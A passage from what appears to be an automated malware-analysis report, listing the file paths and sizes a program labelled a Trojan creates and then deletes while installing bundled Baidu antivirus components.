%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (58402 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (9320 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (41699 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (36536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (8752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (938 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (66750 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (46488 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (21480 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (1704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (13 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (8184 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (33747 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (0 bytes)
